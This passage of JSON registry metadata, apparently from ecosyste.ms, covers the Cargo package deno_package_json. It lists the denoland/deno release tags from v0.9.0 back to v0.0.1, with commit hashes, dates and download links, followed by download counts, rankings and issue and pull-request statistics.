om/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T13:25:49.636Z","dependent_packages_count":0,"downloads":738475,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":47.41833843651933,"dependent_repos_count":26.487955639228183,"dependent_packages_count":35.131366740986806,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":36.34588693891144},"purl":"pkg:cargo/deno_package_json","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_package_json","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_package_json","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_package_json/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-06T13:00:35.403Z","issues_count":6650,"pull_requests_count":9667,"avg_time_to_close_issue":17138573.200682055,"avg_time_to_close_pull_request":1530522.5908357133,"issues_closed_count":3810,"pull_requests_closed_count":8052,"pull_request_authors_count":589,"issue_authors_count":2489,"avg_comments_per_issue":2.5046616541353384,"avg_comments_per_pull_request":0.7208027309403124,"merged_pull_requests_count":7030,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":673,"past_year_pull_requests_count":1190,"past_year_avg_time_to_close_issue":1344289.2103004293,"past_year_avg_time_to_close_pull_request":1305317.8687782804,"past_year_issues_closed_count":233,"past_year_pull_requests_closed_count":663,"past_year_pull_request_authors_count":190,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2332838038632987,"past_year_avg_comments_per_pull_request":1.134453781512605,"pas